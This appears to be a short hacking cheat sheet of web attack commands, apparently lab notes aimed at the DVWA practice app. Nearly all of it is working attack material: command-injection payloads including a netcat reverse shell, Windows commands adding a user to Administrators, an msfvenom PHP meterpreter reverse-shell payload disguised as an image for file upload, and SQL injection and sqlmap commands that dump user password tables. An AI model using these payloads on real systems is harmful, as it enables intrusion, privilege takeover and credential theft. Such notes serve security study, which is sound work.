Hacking Web Applications and Web Servers
Command Execution
Linux
127.0.0.1 && ls
127.0.0.1 & ls
127.0.0.1 & ls
127.0.0.1 ; ls
127.0.0.1 | ls
- with space127.0.0.1 |ls
- without space127.0.0.1 && nc -c sh 127.0.0.1 9001
Windows
hostname
whoami
tasklist
taskkill /PID 3112 /F
- forcefully kills the processesdir c:\\
net user
net user test /add
- add a new usernet localgroup Administrators test /add
- add test user to administratorsnet user test
- details of the userdir c:\\”pin.txt”
type c:\\”pin.txt”
Brute-Forcing
File Upload
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php
exploit.php.img
GIf89a;
- add this line to any file to make it as image fileuse multi/handler
SQL Injection
Manual
1’ UNION SELECT user, password FROM users#
Sqlmap
sqlmap -r req.txt --batch
sqlmap -r req.txt --batch --level=5 --risk=3
sqlmap -r req.txt --batch --level=5 --risk=3 --current-db
sqlmap -r req.txt -D dvwa --tables
sqlmap -r req.txt -D dvwa -T users --columns
sqlmap -r req.txt -D dvwa -T users --dump
Last updated